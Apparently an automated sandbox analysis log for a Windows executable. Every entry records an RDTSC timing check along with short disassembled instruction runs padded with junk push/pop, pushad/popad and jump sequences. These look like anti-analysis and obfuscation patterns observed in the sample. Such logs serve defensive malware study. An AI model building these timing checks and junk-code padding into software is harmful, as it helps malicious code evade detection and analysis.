            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5264BF second address: 5264C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5264C8 second address: 5264CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5264CE second address: 5264D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5264D7 second address: 5264FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007FA4C902634Eh 0x00000011 jmp 00007FA4C902634Ch 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 605EC1 second address: 605EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 60ACB5 second address: 60ACBD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 60ACBD second address: 60ACC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6115BE second address: 6115E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9026359h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FA4C9026346h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6115E4 second address: 61160C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FA4C9084162h 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FA4C9084156h 0x00000015 jo 00007FA4C9084156h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 61160C second address: 611610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 611610 second address: 611616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 611616 second address: 611644 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA4C9026364h 0x0000000c jmp 00007FA4C902634Fh 0x00000011 jmp 00007FA4C902634Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 620084 second address: 620094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA4C9084156h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 620350 second address: 62035D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 5358E3 second address: 5358E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6207A8 second address: 6207AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6207AC second address: 6207B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6207B2 second address: 6207B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 62090F second address: 620913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 620913 second address: 62092E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA4C902634Fh 0x0000000d push ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 62092E second address: 620948 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FA4C9084163h 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 627237 second address: 627240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 626DA3 second address: 626DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C908415Ah 0x00000009 jmp 00007FA4C908415Bh 0x0000000e popad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 626DC4 second address: 626DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 jnc 00007FA4C9026346h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 626F3D second address: 626F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 63E0BA second address: 63E0C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 63DF19 second address: 63DF4D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FA4C908415Bh 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pushad 0x00000011 jmp 00007FA4C9084169h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 63DF4D second address: 63DF66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026355h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 649AEB second address: 649B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9084169h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 64C68D second address: 64C691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 64C691 second address: 64C6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA4C9084166h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 64C81B second address: 64C81F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 64C81F second address: 64C839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA4C9084162h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 64C839 second address: 64C84C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA4C902634Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6747FA second address: 674815 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA4C9084161h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 674815 second address: 674829 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FA4C9026346h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 674829 second address: 674840 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jns 00007FA4C9084158h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6735C9 second address: 6735F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA4C902634Fh 0x0000000c jmp 00007FA4C9026352h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 673764 second address: 673778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop ebx 0x0000000a jbe 00007FA4C9084172h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 673778 second address: 67377C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 673A2F second address: 673A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 673A33 second address: 673A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA4C9026351h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 673FD3 second address: 673FDD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9084156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 673FDD second address: 673FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA4C9026359h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 673FFC second address: 67401A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9084156h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA4C9084160h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 67401A second address: 674024 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA4C9026346h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 674162 second address: 674166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 674166 second address: 674189 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FA4C9026359h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 674189 second address: 6741AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FA4C9084158h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 674487 second address: 6744A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007FA4C9026346h 0x0000000b jmp 00007FA4C9026352h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6771F5 second address: 677210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA4C9084162h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 67749F second address: 6774A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 677588 second address: 677595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FA4C9084156h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 677595 second address: 6775BA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA4C9026346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov dl, bh 0x0000000e push 00000004h 0x00000010 xor dword ptr [ebp+122D1DB1h], edx 0x00000016 push 2D6DF673h 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007FA4C9026348h 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6775BA second address: 6775C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 6775C0 second address: 6775C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 677827 second address: 677830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 677830 second address: 677834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 678B3C second address: 678B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FA4C9084156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007FA4C908415Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 67A9F2 second address: 67AA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FA4C9026356h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 67A509 second address: 67A512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 67C5EE second address: 67C5F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 67C5F3 second address: 67C612 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084169h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 67C612 second address: 67C616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 67C616 second address: 67C61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DF07A6 second address: 4DF07AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DF07AA second address: 4DF07AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DF07AE second address: 4DF07B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DF07B4 second address: 4DF07D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0E83 second address: 4DC0ED2 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA4C9026358h 0x00000008 or ecx, 5C665F48h 0x0000000e jmp 00007FA4C902634Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov esi, 45E446BFh 0x0000001b popad 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FA4C9026352h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0ED2 second address: 4DC0ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0ED6 second address: 4DC0EF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026358h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0EF2 second address: 4DC0F7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C908415Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA4C9084164h 0x00000011 and ch, 00000068h 0x00000014 jmp 00007FA4C908415Bh 0x00000019 popfd 0x0000001a mov edx, esi 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FA4C9084160h 0x00000026 sub eax, 589D88C8h 0x0000002c jmp 00007FA4C908415Bh 0x00000031 popfd 0x00000032 push eax 0x00000033 push edx 0x00000034 pushfd 0x00000035 jmp 00007FA4C9084166h 0x0000003a sub si, 0B28h 0x0000003f jmp 00007FA4C908415Bh 0x00000044 popfd 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0F7A second address: 4DC0F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA4C9026350h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0F92 second address: 4DC0F97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E307C1 second address: 4E307E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9026359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4E307E6 second address: 4E307EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0B9A second address: 4DC0BA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0BA0 second address: 4DC0BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0BA6 second address: 4DC0BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0BAA second address: 4DC0BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0BAE second address: 4DC0BD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FA4C9026354h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov cx, bx 0x00000017 mov si, bx 0x0000001a popad 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0BD8 second address: 4DC0C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007FA4C908415Ch 0x00000012 jmp 00007FA4C9084162h 0x00000017 popad 0x00000018 jmp 00007FA4C9084162h 0x0000001d popad 0x0000001e push dword ptr [ebp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FA4C908415Ah 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0C35 second address: 4DC0C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0C39 second address: 4DC0C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 4DC0C3F second address: 4DC0C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C902634Dh 0x00000009 rdtsc
